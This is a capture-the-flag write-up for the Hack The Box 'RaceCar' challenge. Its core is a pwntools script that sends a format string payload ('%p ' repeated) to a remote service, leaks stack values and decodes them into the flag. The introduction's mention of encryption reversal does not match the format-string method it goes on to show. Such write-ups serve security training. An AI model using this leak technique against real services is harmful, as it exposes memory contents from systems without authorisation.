HackTheBox RaceCar Writeup
Explore the basics of cybersecurity in the RaceCar Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/242
Description
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!
Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/usr/bin/env python3
from pwn import *
def get_process():
try:
host, port = sys.argv[1].split(':')
return remote(host, int(port))
except IndexError:
print(f'Usage: python {sys.argv[0]} <ip:port>')
exit(1)
try:
context.log_level = 'ERROR'
payload = b'%p ' * 25
p = get_process()
p.sendlineafter(b'Name:', b'a')
p.sendlineafter(b'Nickname:', b'aa')
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'1')
p.sendlineafter(b'>', payload)
p.recv()
response = p.recv().decode('utf-8')
flag_hex_string = response.split('\n')[2]
print(f'Flag encoded in hex: {flag_hex_string}')
flag_hex_string_array = flag_hex_string.split(' ')
flag = ''
for piece in flag_hex_string_array:
hex_value = piece.lstrip('0x')
try:
decoded_bytes = bytearray.fromhex(hex_value).decode('utf-8', errors='replace')
reversed_bytes = decoded_bytes[::-1]
flag += reversed_bytes
except ValueError:
continue
print(f'Decoded flag: {flag.strip()}')
except Exception as e:
print(f'An error occurred: {e}')
Summary
The RaceCar Challenge on Hack The Box is a very-easy-level challenge that uses Pwntools to send a format string payload, leak data, and decode a hexadecimal flag. The flag is reversed and displayed, demonstrating basic exploitation and string manipulation.
This post is licensed under CC BY 4.0 by the author.